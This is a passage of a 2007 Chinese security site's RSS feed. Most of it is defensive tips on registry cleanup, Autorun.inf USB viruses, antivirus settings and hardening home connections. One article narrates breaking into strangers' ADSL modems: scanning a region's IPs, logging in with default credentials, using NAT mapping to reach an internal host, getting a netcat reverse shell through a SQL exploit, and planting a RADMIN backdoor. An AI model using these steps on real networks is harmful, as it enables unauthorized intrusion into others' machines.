<P>　　六、清除病毒后一定要打扫战场——手动修复注册表虽然把病毒文件删除了，但病毒都会在注册表留下垃圾键值，还需要把这些垃圾清除干净。1、用reg export备份自启动。由于自启动键值很多，发现病毒时手动查找很不方便。这里用reg export+批处理命令来备份。</P>
<P>　　启动记事本输入下列命令：</P>
<P>　　reg export HKLM\software\Microsoft\Windows\</P>
<P>　　CurrentVersion\Run fo:\hklmrun.reg</P>
<P>　　reg export HKCU\Software\Microsoft\Windows\</P>
<P>　　CurrentVersion\Policies\Explorer\Run f:\hklcu.reg</P>
<P>　　reg export HKLM\SOFTWARE\Microsoft\Windows\</P>
<P>　　CurrentVersion\Policies\Explorer\Run hklml.reg</P>
<P>　　注：这里只列举几个常见键值的备份，其它键值请参照上述方法制作。</P>
<P>　　然后将它保存为ziqidong.bat在命令提示符下运行它，即可将所有自启动键值备份到相应的reg文件中，接着再输入：</P>
<P>　　copy f:\*.reg ziqidong.txt</P>
<P>　　命令的作用是将所有备份的reg文件输出到“ziqidong.txt”中，这样如果发现病毒新增自启动项，同上次导出自启动值，利用上面介绍的FC命令比较前后两个txt文件，即可快速找出新增自启动项目。</P>
<P>　　2、用reg delete删除新增自启动键值。比如：通过上面的方法在[HKER_CURRENT_USER\SOFTWARE\Microsoft\</P>
<P>　　Windows\CurrentVersion\Run],找到一个“Logon”自启动项，启动程序为“c:\windows\winlogon.exe”,现在输入下列命令即可删除病毒自启动键值：</P>
<P></P>
<P>　　reg delete HKLM\software\Microssoft\Windows\</P>
<P>　　CurrentVersion\Run /f</P>
<P>　　3、用reg import恢复注册表。Reg de-lete删除是的是整个RUN键值，现在用备份好的reg文件恢复即可，输入下列命令即可迅速还原注册表：</P>
<P>　　reg import f:\hklmrun.reg</P>
<P>　　上面介绍手动杀毒的几个系统命令，其实只要用好这些命令，我们基本可以KILL掉大部分的病毒，当然平时就一定要做好备份工作。</P>
<P>　　提示：上述操作也可以在注册表编辑器里手动操作，但是REG命令有个好处，那就是即使注册表编辑器被病毒设置为禁用，也可以通过上述命令导出/删除/导入操作，而且速度更快！</P>
<P>　　七、捆绑木马克星——FIND</P>
<P>　　上面介绍利用系统命令查杀一般病毒，下面再介绍一个检测捆绑木马的“FIND”命令。相信很很多网虫都遭遇过捆绑木刀，这些“批着羊皮的狼”常常躲在图片、FLASH、甚至音乐文件后面。当我们打开这些文件的时候，虽然在当前窗口显示的确实是一幅图片（或是播放的FLASH），但可恶的木马却已经在后台悄悄地运行了</P><br/><a href="http://www.csnic.net:81/n568c38p2.aspx" target="_blank">后页</a>]]></description>
</item>
<item>
	<title><![CDATA[减少杀毒软件“扫描”资源占用]]></title>
	<link><![CDATA[http://www.csnic.net:81/n567c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:31:30 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[<P>　　扫描操作是杀毒软件保护系统的家常便饭了，为了加快扫描速度，可以“告诉”卡巴斯基不必重复扫描已经检查过的旧文件。打开设置窗口，先点击“扫描”标签页，单击右栏的“自定”按钮。</P>
<P>　　在弹出的窗口选择“扫描程序和文档（按内容）”，并勾选“只扫描新的和已更改的文件”，然后在“复合文件”组里，点击两个复选框的“全部”文字链接，使其变成“仅新的”，最后点击“确定”按钮返回设置窗口。当然，对于常受攻击的“关键区域”，笔者建议将其安装级别设置为“高”。</P>]]></description>
</item>
<item>
	<title><![CDATA[与脚本病毒做斗争 几种常见的杀毒方法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n566c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:30:52 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[<P>　　有过网吧或者机房管理经验朋友肯定知道，如果机子中了病毒的话是很让人头疼的事情，现在的病毒大多都具有复制能力特别强，能够通过局域网传播，大量耗费系统资源等特点，一个局域网内只要有一台机子中了病毒，如果不及时的杀毒和隔离的话，其他的机子很快便会感染病毒，如何防止病毒，和快速的杀毒成了每个网管所迫切考虑的事情。</P>
<P>　　其实网吧内的常见的病毒有两种，一种是类似与CIH的病毒这种高破坏性的病毒，中了之后系统会无法启动，这种病毒的危害大，但是中毒的几率相对很少；另一中就是脚本病毒。这类病毒一味的耗费系统资源，直到系统崩溃死机，比起CIH病毒来说，它们看似很不起眼，但却做让人头疼。有没有克制脚本病毒的方法呢？笔者在实践中总结了以下几条经验。</P>
<P>　　第一，装系统的时候要用光盘启动硬盘来装，光盘要保证以前用过的没有携带病毒的，硬盘一定要没有任何文件，否则残留的文件里面很可能就感染了病毒，这一点一定要毫不留情，不要为了要备份一个驱动或者一个软件不把它删除。否则你刚装完系统发现已经中了病毒，那可就后悔莫及了。</P>
<P>　　第二，装完系统后，再装驱动之前，最好先用装个杀毒软件，杀毒软件首先要保证自己没有病毒，其实你可以把WIN98安装文件，杀毒软件等，网吧机器的驱动放在一起用EasyBoot做个启动光盘。有了这张盘，你在装其他软件和游戏之前就可以保证母盘不感染病毒了。</P>
<P>　　第三，装好驱动后先上网把杀毒软件更新到最新，然后开着病毒防火墙，从事先准备好的机器上调用软件和游戏的安装文件来安装网吧的必备软件和常玩的游戏，一切都弄好后测试一遍游戏和软件，然后在C盘目录下建立一个ADMIN的文件夹，把专杀工具包，硬盘工具包，网络克隆工具，还有备份的注册表放到里面备用。一般样板盘做成这样就很好了，当然如果系统配置不高，为了不影响玩游戏的速度，在克隆完之后要把病毒防火墙的自启动取消。</P>
<P>　　装杀毒软件不是让它老开着防火墙，因为一来它耗费系统资源，二来平时安装着还原精灵，有病毒重启一下就好了，它主要用在以后升级游戏或者调用文件的时候把防火墙打开防止调用文件中的病毒感染系统，更何况人非圣贤，孰能无过，再谨慎的人也不会保证以后肯定不会出病毒，所以一定要为每台机子装上杀毒工具，但平时没必要启用它的保护功能。</P>
<P>　　在网络上的人肯定都中过爱情森林，新欢乐时光等这些顽固的病毒，尤其是在局域网里，往往是所有的机子都感染病毒，每个机子能杀出几百个到上千个病毒，我曾经在一台机子上用瑞星杀出过8000多个病毒。</P>
<P></P>
<P>　　这些病毒非常恶劣，一般在WINDOWS下是不容易杀干净的，每次杀完病毒，紧接着再杀的时候就会发现杀毒软件本身还有EXPLOR.EXE等进程依然感染着病毒，你无论怎么杀也杀干净，这样的话最好是重起到安全模式下再杀，杀毒的时候不要打开任何的窗口，因为有些病毒只要你打开窗口就会激活，它占用到内存的话就很难清除了。杀完后重起再进安全模式再杀，一般这样几次病毒就会杀干净了。如果还不行的话就要到DOS下查杀了，一般的杀毒软件都有它的DOS版本。重启动到纯DOS模式下，跳转到安装目录下运行那个程序会有个提示，不过这样查杀病毒的速度一般很慢。值得注意的是如果所有的机子都中了病毒的话，一定要把交换机关掉一台一台的杀，杀完后备份C盘，并用保护卡保护起来。</P>
<P>　　脚本病毒这样清除就可以了，但是对于CIH等病毒来说，除了杀完毒后还有做恢复工作，一般来说它就是破坏分区表和主引导程序，严重的话破坏BIOS。我们可以分别来对待，如果损坏的仅仅是主引导记录，可以用干净的启动软盘或光盘启动系统运行fdisk /mbr就可以了，也可以用DISKMAN，DISKGEN等小工具来重建主引导记录。如果损坏的是分区表，首先考虑的是用DISKMAN的恢复分区表功能，破坏的不太严重的话一般可以恢复的。不过，如果你对磁盘结构，分区表，I/O表，FAT表不熟悉的话，笔者还是建议专业人员来修理好些，毕竟这样安全系数更大。</P>]]></description>
</item>
<item>
	<title><![CDATA[三点高招解除闪存盘内的病毒]]></title>
	<link><![CDATA[http://www.csnic.net:81/n565c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:30:09 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[<P>　　时下，我们常常会在硬盘的各个分区根目录下面看到“Autorun.inf”这样的文件，并且用鼠标双击磁盘分区图标时，往往无法打开对应分区窗口;遭遇类似上述现象时，那几乎就能断定本地计算机系统已经感染了近来非常猖獗的闪盘病毒，这种病毒一般通过“Autorun.inf”文件进行传播，只要我们双击闪盘分区图标时，该病毒就会通过“Autorun.inf”文件中的设置来自动激活病毒，然后将“Autorun.inf”文件同时拷贝到其他分区，导致其他分区都无法用双击鼠标的方法打开。为了保护系统安全，本文下面就为各位献上这类病毒解除方法以及预防措施，希望下面内容能对大家有用!</P>
<P>　　赤手空拳，删除“Autorun.inf”文件</P>
<P>　　当计算机系统不小心感染了“Autorun.inf”文件病毒时，该病毒就会自动在本地硬盘的所有分区根目录下面创建一个“Autorun.inf”文件，该文件在默认状态下具有隐藏属性，用普通方法是无法直接将它删除掉的。要想删除“Autorun.inf”病毒文件，我们可以按照如下方法来操作：</P>
<P>　　 <IMG onclick=get_larger(this) src="http://www.csnic.net:81/upload/2007_09/070905153041441.jpg"></P>
<P>　　首先用鼠标双击系统桌面中的“我的电脑”图标，在其后弹出的窗口中依次单击“工具”/“文件夹选项”菜单命令，打开文件夹选项设置窗口，单击该窗口中的“查看”标签，并在对应标签页面中选中“显示所有文件和文件夹”项目，同时将“隐藏受保护的操作系统文件”的选中状态取消掉，再单击“确定”按钮，这么一来“Autorun.inf”病毒文件就会显示在各个分区根目录窗口中了;</P>
<P>　　其次用鼠标右键单击“我的电脑”窗口中的某个磁盘分区图标，从弹出的快捷菜单中执行“打开”命令，进入到该分区的根目录窗口，在其中我们就能看到“Autorun.inf”病毒文件的“身影”了;再用鼠标右键单击“Autorun.inf”文件，并执行右键菜单中的“打开”命令将“Autorun.inf”文件打开，随后我们就会看到里面的“open=xxx.exe”内容，其实“xxx.exe”就是具体的病毒名称。倘若这类病毒没有进程保护时，我们只需要将“xxx.exe”文件以及各个“Autorun.inf”文件直接删除掉，就能将闪盘病毒从系统中清除掉了;</P>
<P></P>
<P>　　 <IMG onclick=get_larger(this) src="http://www.csnic.net:81/upload/2007_09/070905153041442.jpg"></P>
<P>　　下面为了防止病毒再次运行发作，我们还需要将遭受病毒破坏的磁盘关联修改过来。在修改磁盘关联时，必须先依次单击“开始”/“运行”命令，打开系统运行对话框，在其中执行注册表编辑命令“regedit”，打开本地系统的注册表编辑窗口;在该编辑窗口的左侧显示区域，先用鼠标展开“HKEY_CLASSES_ROOT”注册表分支，然后在该分支下面依次选择“Driveshell”项目，在对应“shell”项目的右侧列表区域(如图2所示)，用鼠标双击“默认”键值，在其后弹出的数值设置窗口中将“默认”键值数值修改为“none”;</P>
<P>　　接下来再用鼠标展开“HKEY_CURRENT_USER”注册表分支，然后在该分支下面依次选择“SoftwareMicrosoftWindowsCurrentVersionExplorer”项目，在对应“Explorer”项目的右侧列表区域，检查一下是否存在一个名为“ountPoints2”键值，一旦发现该键值的话，我们必须及时将它删除掉，最后按一下键盘上的F5功能键，来刷新系统注册表的设置，这么一来闪盘病毒就被我们手工清除掉了，此时当我们再尝试用双击方法打开分区窗口时，就会看到对应分区窗口能被正常打开了。</P>
<P>　　借用外力，抑制闪盘病毒再生</P>
<P>　　倘若我们的计算机不小心中了闪盘病毒的黑手，尝试使用上面的方法无法删除“Autorun.inf”文件，而且重新安装了计算机系统后仍然无法使用双击鼠标方法打开分区窗口时，我们可以选用一款名为“费尔木马强力清除助手”的工具，来让本地系统摆脱闪盘病毒的“干扰”，并且有效抑制该类型病毒的继续发作。下面就是抑制闪盘病毒再生的具体操作步骤：</P>
<P>　　首先从网上将“费尔木马强力清除助手”工具下载到本地硬盘中，并对它进行正确安装;安装完毕后，直接运行“费尔木马强力清除助手”程序，在其后弹出的程序界面中选中“抑制文件再次生成”项目，同时在“文件名”文本框中输入“Autorun.inf”文件的具体路径信息，例如笔者在这里输入“C:Autorun.inf”，再单击“清除”按钮，这么一来C分区下面的“Autorun.inf”文件就被清除干净了;按照相同的操作方法，再将其他分区中的“Autorun.inf”文件删除干净。</P>
<P></P>
<P>　　接着我们再按常规方法重新安装一下操作系统，或者直接通过Ghost程序来快速恢复一下系统，相信这么一来重装过后的系统就会摆脱闪盘病毒的“干扰”了。</P>
<P>　　小小巧招，预防闪盘病毒再次袭击</P>
<P>　　当摆脱了闪盘病毒的“干扰”后，我们现在是不是就可以高枕无忧了呢?其实，闪盘病毒随时可能再次袭击我们，为此我们必须采取有效措施，让本地系统远离闪盘病毒。而要预防闪盘病毒再次袭击的方法非常简单，我们只需要在闪盘根目录下面自己手工创建一个“Autorun.inf”文件，这样一来闪盘病毒日后就无法往闪盘根目录下面自动生成“Autorun.inf”病毒文件了，毕竟相同的目录下面是不允许创建同名文件或同名文件夹的，那样的话闪盘病毒就无法通过闪盘进行非法传播了。同样地，这种预防闪盘病毒的方法也适用于移动硬盘!</P>]]></description>
</item>
<item>
	<title><![CDATA[把流氓拒之门外—360safe新版尝鲜]]></title>
	<link><![CDATA[http://www.csnic.net:81/n564c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:19:38 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[<P>　　对于病毒、木马，大家都知道安装了杀毒软件就可以在发现他们即将入侵系统的时候，给予警告提示，并直接进行隔离、删除等操作。而对付恶意软件，以往我们只能用反恶意软件进行被动查杀，根本没有完整有效的预警机制。不过最新版本的360安全卫士终于增加了主动防御功能，有了它，你可以像杀毒软件那样，在恶意软件还没危害电脑之前，将其彻底拒之门外了！</P>
<P>　　一、给系统请一个24小时保镖</P>
<P>　　安装并运行360安全卫士3.0beta之后，切换到“保护”菜单，进入“开启实时保护”标签，分别在“恶意软件入侵拦截”、“恶意网站拦截”、“系统实时扫描”三处点击“开启”按钮，重新启动计算机，360安全卫士就会成为一名24小时值勤的系统保镖了。（图1）</P>
<P>　　 <IMG onclick=get_larger(this) src="http://www.csnic.net:81/upload/2007_09/070905152934511.jpg"></P>
<P>　　图1</P>
<P>　　当我们不小心安装某个恶意软件时，如屁屁狗（PPGou），360安全卫士会弹出警告窗口“屁屁狗正在安装到系统中！”，并给出其危险级别、路径等详细信息，也为用户提供了几个可选择的操作——“卸载该软件”、“允许其安装”、“允许，并将其加入信任软件列表”。这时候我们只需要选择“卸载该软件”即可将PPGou拒之门外。（图2）</P>
<P>　　 <IMG onclick=get_larger(this) src="http://www.csnic.net:81/upload/2007_09/070905152934512.jpg"></P>
<P></P>
<P>　　图2 </P>
<P>　　小提示：</P>
<P>　　对于360安全卫士的提示，建议选择“卸载”、“拒绝”等操作，如果用户实在需要安装某款恶意软件，建议选择“允许其安装”，这样即便这次安装了，下次再监测到这款软件，360安全卫士会再次给出警告，比较安全。</P>
<P>　　二、小试牛刀，看看保镖有啥能耐</P>
<P>　　究竟360安全卫士能在哪些时候给出报警提示呢？实际上，只要有恶意软件侵害系统，它都会马上做出反应。为此，笔者专门做了几个验证，发现主要有几种情况：</P>
<P>　　★安装恶意软件：比如前文中提到的PPGou，当我们安装这款恶意软件时，360安全卫士就会给出警告。</P>
<P>　　★安装捆绑有恶意软件的软件：如果你即将安装的软件中捆绑有恶意程序，则360安全卫士同样会给出警告。这可以从传播渠道上杜绝恶意软件的流通。（图3）</P>
<P>　　<IMG onclick=get_larger(this) src="http://www.csnic.net:81/upload/2007_09/070905152934513.jpg"></P>
<P>　　图3 </P>
<P>　　★浏览到恶意网站：比如某个网站中含有恶意代码，360安全卫士给出警告。（图4）</P>
<P>　　<IMG onclick=get_larger(this) src="http://www.csnic.net:81/upload/2007_09/070905152934514.jpg"></P>
<P>　　图4 </P>
<P>　　★当恶意程序试图修改系统文件时：比如恶意软件企图往注册表里写入数据、加载到系统启动项、生成某些文件等等时，360安全卫士都会给出警告。</P>
<P>　　小提示：</P>
<P>　　对于恶意软件的拦截，360安全卫士采用的是钩子（Hook）技术，钩子函数能对截获的消息进行各种修改处理，甚至强行终止该消息的继续传递；对于恶意网站拦截则使用的是BHO技术，该技术能阻止一切对IE的恶意事件；而其系统实时扫描功能则采用了和微软Windows defender相同的技术，利用系统空余时间定时扫描系统关键位置。</P>
<P></P>
<P>　　二、调教一下你的保镖</P>
<P>　　尽管360安全卫士已经足够智能，我们只需要按照其提示操作即可，但它依然提供了更强大定制功能，让我们更加有效地对付恶意软件。下面提供几个小技巧：</P>
<P>　　1.手动添加恶意网站</P>
<P>　　在360安全卫士中切换到“保护”菜单，打开“高级设置”标签，点击“自定义恶意网站黑名单”按钮，在打开的窗口中输入恶意网站的地址，比如“www.3448.com”后点击“添加”，之后浏览所有包含“www.3448.com”URL的网站时，浏览器会自动转向一个本地页面，提示“您将要访问的网站可能存在不安全因素，您是否要继续访问？”，以免中招。（图5）</P>
<P>　　<IMG onclick=get_larger(this) src="http://www.csnic.net:81/upload/2007_09/070905152934515.jpg"></P>
<P>　　图5 </P>
<P>　　2.让360安全卫士对某些插件“手下留情”</P>
<P>　　有些插件可能正是你需要的，但被360安全卫士列为不信任的插件，你可以手动将其设置为信任插件，方法很简单：在360安全卫士中切换到“查杀”菜单，打开“卸载多余插件”标签，在扫描获得的插件列表中选中该插件，点击“信任选中插件”。这样，以后该插件对系统进行修改时，360安全卫士将不会弹出提示。（图6）</P>
<P>　　<IMG onclick=get_larger(this) src="http://www.csnic.net:81/upload/2007_09/070905152934516.jpg"></P>
<P>　　图6</P>]]></description>
</item>
<item>
	<title><![CDATA[宽带用户防范 黑客恶意攻击的十大招式]]></title>
	<link><![CDATA[http://www.csnic.net:81/n562c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:09:40 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>随着黑客工具的简单化和傻瓜化，众多的技术水平不高的用户也可以利用手中的黑客工具大肆进行攻击(这些人又被称为“灰客”)，我们的上网安全受到了极大的威胁，难道我们只能被迫挨打，任其欺负吗?当然不是，只要设置得好，这些人是奈何不了我们的!请看本文讲述的十种方法。 
<P><STRONG>一、隐藏IP地址<BR></STRONG>&nbsp;<BR>　　黑客经常利用一些网络探测技术来查看我们的主机信息，主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念，如果攻击者知道了你的IP地址，等于为他的攻击准备好了目标，他可以向这个IP发动各种进攻，如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。<BR>&nbsp;<BR>　　与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后，其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现了隐藏用户IP地址的目的，保障了用户上网安全。提供免费代理服务器的网站有很多，你也可以自己用代理猎手等工具来查找。 </P>
<P><STRONG>二、关闭不必要的端口</STRONG> </P>
<P>　　黑客在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序，该监视程序则会有警告提示。如果遇到这种入侵，可用工具软件关闭用不到的端口，比如，关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。<BR>&nbsp;<BR><STRONG>三、更换管理员帐户</STRONG> </P>
<P>　　Administrator帐户拥有最高的系统权限，一旦该帐户被人利用，后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码，所以我们要重新配置Administrator帐号。<BR>&nbsp;<BR>　　首先是为Administrator帐户设置一个强大复杂的密码，然后我们重命名Administrator帐户，再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来，入侵者就很难搞清哪个帐户真正拥有管理员权限，也就在一定程度上减少了危险性。 </P>
<P><STRONG>四、杜绝Guest帐户的入侵</STRONG><BR>&nbsp;<BR>　　Guest帐户即所谓的来宾帐户，它可以访问计算机，但受到限制。不幸的是，Guest也为黑客入侵打开了方便之门!网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法，所以要杜绝基于Guest帐户的系统入侵。<BR>&nbsp;<BR>　　禁用或彻底删除Guest帐户是最好的办法，但在某些必须使用到Guest帐户的情况下，就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码，然后详细设置Guest帐户对物理路径的访问权限。举例来说，如果你要防止Guest用户可以访问tool文件夹，可以右击该文件夹，在弹出菜单中选择“安全”标签，从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限，比方说只能“列出文件夹目录”和“读取”等，这样就安全多了<BR>。 <BR><STRONG>五、封死黑客的"后门"</STRONG> </P>
<P>　　俗话说“无风不起浪”，既然黑客能进入，那我们的系统一定存在为他们打开的"后门"，我们只要将此堵死，让黑客无处下手，岂不美哉! </P>
<P>1.删掉不必要的协议 </P>
<P>　　对于服务器和主机来说，一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”，选择“属性”，再鼠标右击“本地连接”，选择“属性”，卸载不必要的协议。其中NetBIOS是很多安全缺陷的源泉，对于不需要提供文件和打印共享的主机，可以将绑定在TCP/IP协议的NetBIOS给关闭，避免针对NetBIOS的攻击。 </P>
<P>2.关闭“文件和打印共享” </P>
<P>　　文件和打印共享应该是一个非常有用的功能，但在我们不需要它的时候，它也是引发黑客入侵的安全漏洞。所以在没有必要"文件和打印共享"的情况下，我们可以将其关闭。即便确实需要共享，也应该为共享资源设置访问密码。 </P>
<P>3.禁止建立空连接 </P>
<P>　　在默认的情况下，任何用户都可以通过空连接连上服务器，枚举帐号并猜测密码。因此我们必须禁止建立空连接。方法有以下两种:方法一是修改注册表:到注册表 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA下，将DWORD值RestrictAnonymous的键值改为1即可。方法二是修改Windows 2000/XP的本地安全策略为“不允许SAM帐户和共享的匿名枚举”。&nbsp;&nbsp; </P>
<P>4.关闭不必要的服务 </P>
<P>　　服务开得多可以给管理带来方便，但也会给黑客留下可乘之机，因此对于一些确实用不到的服务，最好关掉。比如在不需要远程管理计算机时，我都会将有关远程网络登录的服务关掉。去掉不必要的服务停止之后，不仅能保证系统的安全，同时还可以提高系统运行速度。<BR>&nbsp;<BR><STRONG>六、做好IE的安全设置</STRONG> </P>
<P>　　ActiveX控件和Java Applets有较强的功能，但也存在被人利用的隐患，网页中的恶意代码往往就是利用这些控件编写的小程序，只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择，具体设置步骤是:“工具”→“Internet选项”→“安全”→“自定义级别”，建议您将ActiveX控件与Java相关选项禁用。谨慎些总没有错! </P>
<P>　　另外，在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过，微软在这里隐藏了“我的电脑”的安全性设定，通过修改注册表把该选项打开，可以使我们在对待ActiveX控件和Java Applets时有更多的选择，并对本地电脑安全产生更大的影响。 </P>
<P>　　下面是具体的方法:打开“开始”菜单中的“运行”，在弹出的“运行”对话框中输入Regedit.exe，打开注册表编辑器，点击前面的“+”号顺次展开到:HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0，在右边窗口中找到DWORD值“Flags”，默认键值为十六进制的21(十进制33)，双击“Flags”，在弹出的对话框中将它的键值改为“1”即可，关闭注册表编辑器。无需重新启动电脑，重新打开IE，再次点击“工具→Internet选项→安全”标签，你就会看到多了一个“我的电脑”图标，在这里你可以设定它的安全等级。将它的安全等级设定高些，这样的防范更严密。<BR>&nbsp;<BR><STRONG>七、安装必要的安全软件</STRONG> </P>
<P>　　我们还应在电脑中安装并使用必要的防黑软件，杀毒软件和防火墙都是必备的。在上网时打开它们，这样即便有黑客进攻我们的安全也是有保证的。 </P>
<P><STRONG>八、防范木马程序</STRONG> </P>
<P>　　木马程序会窃取所植入电脑中的有用信息，因此我们也要防止被黑客植入木马程序，常用的办法有: </P>
<P>　　● 在下载文件时先放到自己新建的文件夹里，再用杀毒软件来检测，起到提前预防的作用。 <BR>　　● 在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目，如果有，删除即可。 <BR>　　● 将注册表里 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。 </P>
<P><STRONG>九、不要回陌生人的邮件</STRONG> </P>
<P>　　有些黑客可能会冒充某些正规网站的名义，然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码，如果按下“确定”，你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件，即使他说得再动听再诱人也不上当。 </P>
<P><STRONG>十、及时给系统打补丁</STRONG> </P>
<P>　　最后，建议大家到微软的站点下载自己的操作系统对应的补丁程序，微软不断推出的补丁尽管让人厌烦，但却是我们网络安全的基础。</P>]]></description>
</item>
<item>
	<title><![CDATA[黑客是如何穿透ADSL路由入侵内网？]]></title>
	<link><![CDATA[http://www.csnic.net:81/n561c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:08:16 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P>也许看烂了网上已有的常规黑客攻击手段，对一些陈旧的入侵手法早已厌烦，近来我对ADSL MODEM的路由功能产生了浓厚的兴趣，经过一番努力，我终于找到了穿透ADSL路由入侵内网的方法，在这里和各位一起分享我的心得。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　一.扫描 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　现在很多ADSL MODEM都是通过80、23、21三个端口来管理，但80、21端口有很多服务器都有打开，没什么特征性，于是我选择了23端口。打开我的至爱：SUPPERSCAN，填上我所在地区的IP段，（跨多几段都没关系，反正SUPPERSCAN的速度就是快）眨眼间，结果出来了。开23的主机还真不少，我挑了几台出来，在浏览器那里输入IP：218.xxx.xxx.xxx，OK。登陆对话框出来了，输入USER：ADSL pass:adsl1234（因为我这里的adsl modem一般是华硕的，缺省是adsl adsl1234），好了，一矢中的，现在我就是上帝。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　二.映射 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　入侵已经成功了一半，要进一步入侵内网，我门要进行端口映射，但是我连内网的拓扑都不知道（更不用说内网主机的端口开放情况了）又怎么映射呢？在此，我选择了猜测。一般来说，MODEM的内网IP缺省是192.168.1.1，而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192.168.1.2的端口映射出来就行了（但如果使用了dhcp就麻烦了）但是192.168.1.2到底开放了什么端口，我们根本就不知道啊。呵呵，既然不知道，那么我就把他整台主机透明地映射到外网。具体做法如下：进入NAT选项---添加NAT规则---BAMID---填入主机IP：192.168.1.2，到此192.168.1.2已经透明地映射到192.168.1.1上，我们访问ADSL MODEM就等于访问主机192.168.1.2了。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　三.检测漏洞 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　现在我们再请出SUPPERSCAN对218.xxx.xxx.xxx进行扫描，呵，看到没有？扫描结果已经不同了，开放的端口是139、1433等，刚才只是开放了80、23、21而已（也就是说我们的映射已经成功了）该是X-SCAN出手了，用它来扫弱口令最好不过了，但扫描的结果令人失望，一个弱口令也没有，看来管理员还不算低啊。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　四.溢出 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　既然没有弱口令，也没开80，那只好从逸出方面着手了，但没开80、21也就webdav .sevr-u的溢出没戏了，很自然，我向导了RPC溢出，但实践证明RPC溢出也是不行的，LSASS溢出也不行 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　五.募然回首，那人却在，灯火阑珊处 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　看来这个管理员还是比较负责的，该打的补丁都打上了。这时侯，我的目光转移到1433上了（嘿，不知道他打了SQL补丁没有？，心动不如行动，现在只好死马当活马医了，于是： <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　这样就成功得到一个shell了。 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　六.设置后门 <BR>&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;&nbsp;&nbsp;&nbsp; 　　到这里，我们的入侵已经成功了，余下的是扫尾留后门，至于后门，我一般都是用FTP上传RADMIN上去的，呵呵，这里不详谈了，相信各位都知道</P>]]></description>
</item>
<item>
	<title><![CDATA[如何找回被盗的QQ密码]]></title>
	<link><![CDATA[http://www.csnic.net:81/n560c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:06:40 GMT</pubDate>
